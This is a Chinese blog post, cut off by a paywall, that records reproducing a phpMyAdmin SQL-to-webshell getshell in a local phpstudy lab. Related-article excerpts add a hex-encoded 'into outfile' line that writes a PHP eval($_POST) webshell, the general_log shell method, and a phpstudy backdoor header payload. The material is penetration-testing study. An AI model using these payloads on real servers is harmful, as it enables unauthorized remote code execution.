(三)phpstudy下开启mysql,运用phpmyadmin管理执行sql语句,写入一句话后门getshell。

最新推荐文章于 2024-08-04 23:03:55 发布
最新推荐文章于 2024-08-04 23:03:55 发布
阅读量3.8k 收藏 6
点赞数
CC 4.0 BY-SA版权
文章标签: mysql phpstudy phpmyadmin getshell 一句话后门
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_32434307/article/details/86489411
本文记录了在phpstudy环境下,启动mysql并使用phpmyadmin管理数据库,尝试写入一句话后门getshell的过程。首先解决了mysql无法启动的问题,通过CMD命令删除原有MySQL服务。接着,为了解决#1290错误,修改了my.ini文件中secure-file-priv设置,允许指定目录的导入导出。最后,通过执行SQL语句成功写入后门文件,并通过菜刀连接实现getshell。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

学习mysql数据库漏洞整理过程中,想复现phpmyadmin写入一句话后门getshell的过程遇到很多问题。phpmyadmin是很多网站用来管理数据库的一个系统,尤其是mysql数据库管理的较多。phpmyadmin实现mysql数据库的管理,采用phpstudy实现较为方便。过程出现较多障碍,一步步走向成功,记录。

1 启动phpstudy,出现mysql无法启动的问题

因为之前已经装过Mysql,并使用过。因此要关闭mysql数据库,并且要把系统服务里面的MySQL删除,留下MySQLa服务。

以管理员运行cmd,在cmd命令行下输入:

sc delete mysql    

2 在通过报错等方式获取phpmyadmin绝对路径后,出现#1290 - The MySQL server is running with the --secure-file-priv option so it cannot execute this statement。

原因是没有开通导入此路径的权限。通过SHOW VARIABLES LIKE "secure_file_priv";查询

因此,我们需要开通此权限在,打开磁盘下PhpStudy\PHPTutorial\MySQL\my.ini文件,修改Secure File Priv。

可以参考一下:

(1)不允许MySQL进行导入导出

# Secure File Priv.
secure-file-priv = null

(2)只允许MySQL在指定的目录下进行导

最低0.47元/天 解锁文章

200万优质内容无限畅学
【渗透测试】phpmyadmin一句话写入+socks代理渗透内网+CVE-2021-3493漏洞利用
serendipity1130的博客
09-02 1130
OFF表示日志关闭C:\phpStudy\MySQL\data\stu1.log为日志绝对路径
mysql 提权_Mysql提权留后门
weixin_33532301的博客
01-18 234
记录次关于无聊时对基友MYSQL服务器的提权攻击。尽管没有完全攻击到对方,并且没有清理痕迹,但是,这里简单的防御方式。0x01.从无聊的nmap扫描开始今晚无聊时候,本想打开电脑扫下谁连进我wifi,无意间,眼睛亮看到了个惊喜。看到80端口,就有种冲动想要进去,进去后发现forbidden,然后试了试 phpmyadmin,发现直接进去,因为基友用的XAMPP集成环境,下就猜到空密码。...
定时任务执行mysql导入语句_使用phpmyadmin的事件功能给Mysql添加定时任务执行SQL语句...
weixin_34910465的博客
01-19 269
要在phpmyadmin中给mysql添加定时任务1、首先查看计划事件是否开启:在phpmyadminSQL查询框中填入“show variables like '%scheduler%';”并执行当显示event_scheduler的“Value”为“ON”时,表示计划事件已开启;当显示event_scheduler的“Value”为“OFF”时,表示计划事件未开启。2、如果计划事件未开启,可...
phpsudy的mysql管理器_phpstudy安装数据库管理工具phpMyAdmin
weixin_30699957的博客
02-05 1668
phpstudy可以使用数据库管理工具phpMyAdmin管理MYSQLphpmyadmin般自动安装位于安装目录下,如www/localhost,根目录与程序文件同级。phpmyadmin需要进行登录,此时需要对配置文件config.default.php先进行相关配置 ,如下:libraries文件夹下config.default.php的配置:1、首先找到phpmyadmin文件夹,找...
phpstudy后门
一个普普通通的博客
04-17 1605
phpstudy后门 漏洞描述 Phpstudy软件是国内的款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQLphpMyAdmin、ZendOptimizer 多款软件次性安装,无需配置即可直接安装使用,具有PHP环境调试和PHP开发功能,在国内有着近百万PHP语言学习者、开发者用户。 正是这样款公益性软件,2018年12月4日,西湖区公安分局网警大队接报案称,某公司发现公司内有20余台计算机被执行危险命令,疑似远程控制抓取账号密码等计算机数据 回传大量敏感信 二、后门
phpMyAdmingetshell
weixin_44940180的博客
08-17 316
想要使用into outfile或者load_file需要先查看secure_file_priv 如果后面有路径,表示上传文件至某个路径 若为null,则表示不可以使用into outfile上传文件 如果在命令行直接设置,则会报错,表示它是个只读变量 所以如果旦这里为null,无法使用into outfile来上传后门 SHOW VARIABLES LIKE '%general%'; 查看日志文件功能是否开启以及文件路径 默认的样子 SET GLOBAL general_log='on'
【小迪安全day13】WEB漏洞——SQL注入之MYSQL注入
RichUee的博客
12-05 1531
MYSQL注入中首先要明确当前注入点权限,高权限注入时有更多的攻击手法,有的能直接进行getshell。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击还是防御都需要了解其中的手法和原理,这样才是个合格的安全工作者。
(四)mysql数据库总结和渗透测试相关漏洞整理
爱上卿的博客
01-16 2557
1.1 Mysql信息收集 1.端口信息收集 Mysql默认端口是3306端口,但也有自定义端口,针对默认端口扫描主要利用扫描软件进行探测,推荐使用: (1)IIS PUT scanner,直接填3306端口,IP地址填单个或者C段地址,速度还是挺快的。 (2)nmap扫描nmap -p 3306 192.168.1.1-254 特定目标的渗透,可能需要对全端口进行扫描,可以使...
常见CMS漏洞(WordPress、DeDeCMS、ASPCMS、PHPMyadmin、Pageadmin)
最新发布
2301_76631050的博客
08-04 2337
利⽤mysql⽇志⽂件shell,这个⽇志可以在mysql⾥改变它的存放位置,登录phpmyadmin可以修改这个存放位置,并且可以修改它的后缀名。PageAdmin CMS系统是基于.Net的⽹站管理系统,安全、稳定、灵活,全国⽤户超过百万,致⼒于为企业、学校、政府⽹站建设和⽹站制作提供企业级内容管理系统解决⽅案。路径: E:\phpstudy_pro\Extensions\MySQL5.7.26\data\。猜测web路径: E:\phpstudy_pro\WWW。不要用\,如里要用\\(转义)
关于phpstudy集成环境中phpmyadmin的相关配置
qq_38938670的博客
02-19 8442
phpstudy包括2种数据库管理工具,分别是phpMyAdminMySQL_Font,如下: 当点击phpmyadmin时需要进行登录,此时需要对配置文件config.default.php先进行相关配置 ,如下: 二、config.default.php的所在位置及配置: 1、首先找到phpmyadmin文件夹,在找到libraries文件夹,找到config.default....
mysqlshell
baidu_39504221的博客
12-18 707
般前提: 有权限,有绝对路径 文件 select 0x3c3f70687020406576616c28245f504f53545b2774657374275d293f3e into outfile'D:\\phpstudy_pro\\WWW\\shell.php'; 以sqli-labs第七关为例 虽然这里报错了,但是文件还是进去了 后面就可以用菜刀连接了 ...
phpstudy后门(转自feng)
qq_45290991的博客
10-07 2091
几天前火绒说我的PHPstudy有马,我以为是误报没有在意,但接着我就在知乎上看到了PHPstudy真可能有后门,于是赶紧看了下,还真有,是我之前下的2016版的,而我在官网下的2019的phpstudy_pro没有问题(文末给出了有后门(!!!)的安装包) 可以看到php-5....
网站被攻击怎么处理 phpstudy存在后门漏洞
网站安全专家
09-27 3723
phpStudy于近日被暴露出有后门漏洞,之前的phpStudy2016,phpStudy2018部分版本,EXE程序包疑似被入侵者植入木马后门,导致许多网站及服务器被攻击,被篡改,目前我们SINE安全公司立即成立phpStudy安全应急响应小组,针对部分客户服务器上安装该PHP键环境搭建的情况,进行了全面的漏洞修复与安全防护。第时间保障客户的网站安全,以及服务器的安全稳定运行。关于该漏洞的详...
php study 后门,phpStudy后门简要分析
weixin_31727937的博客
03-10 261
问题概要有问题的版本如下phpStudy20180211版本php5.4.45与php5.2.17ext扩展文件夹下的php_xmlrpc.dllphpStudy20161103版本php5.4.45与php5.2.17ext扩展文件夹下的php_xmlrpc.dll注:这两个官网下载的版本里,都没有发现php5.3版本下存在有问题的php_xmlrpc.dll,打开时会提示存在pdb路径...
phpstudy后门简单分析
fa1lr4in的小博客
09-25 1807
感谢pcat师傅的文章:https://mp.weixin.qq.com/s/dIDfgFxHlqenKRUSW7Oqkw 20号得知phphstudy有后门,不知道官网的是不是也被入侵了,当时没有进行查看,,,由于当时正在秋招面试比较忙,鸽了几天有了下文: 被中马的为php_xmlrpc.dll这个dll文件,这个可以通过查找泄露字符串很容易通过脚本实现,就不贴了,可以以eval为关键...
phpmyadmin写入一句话木马】操作详情
吉吉的博客
03-16 1582
phpmyadmin写入一句话木马操作
漏洞复现】之PhpStudy后门利用复现、修复及使用脚本快速复现(最全,转自https://www.cnblogs.com/yankaohaitaiwei/p/11604762.html)
qq_45290991的博客
10-07 1416
漏洞复现】之PhpStudy后门利用复现、修复及使用脚本快速复现 (本文仅为平时学习记录,若有错误请大佬指出,如果本文能帮到你那我也是很开心啦)   该复现参考网络中的文章,该漏洞复现仅仅是为了学习交流,严禁非法使用!!!    、事件背景   北京时间9月20日,杭州公安发布《杭州警方通报打击涉网违法犯罪暨‘净网2019’专项行动战果》文,文章曝光了国内知名PHP调试环境程序集成包“PhpStudy软件”遭到黑客篡改并植入“后...
shell 写入文件_phpMyAdmin利用日志文件GetSHELL
weixin_35583709的博客
01-24 520
phpMyAdmin简介phpMyAdmin 是众多MySQL图形化管理工具中使用最为广泛的种,是款使用PHP 开发的基于B/S模式的MySQL客户端软件,该工具是基于 Web 跨平台的管理程序,并且支持简体中文,用户可以在官网上下载最新版本的。GetSHELL前提1、phpMyAdmin利用日志文件GetSHELL前提账号必须有可读可权限2、MySQL版本大于5.0,MySQL 5.0版本...
php命令执行后门,phpstudy后门利用方法及getshell
weixin_33207144的博客
03-10 1100
0x01 phpstudy利用方法请求任意后缀为php的文件目标环境为php5.2,5.4,且不能为nts存在Accept-Encoding: gzip,deflate此处填base64加密后的payload:accept-charset: c3lzdGVtKCdjYWxjLmV4ZScpOwGET/phpinfo.phpHTTP/1.1Host:192.168.1.1User-Agent...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

爱上卿Ooo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值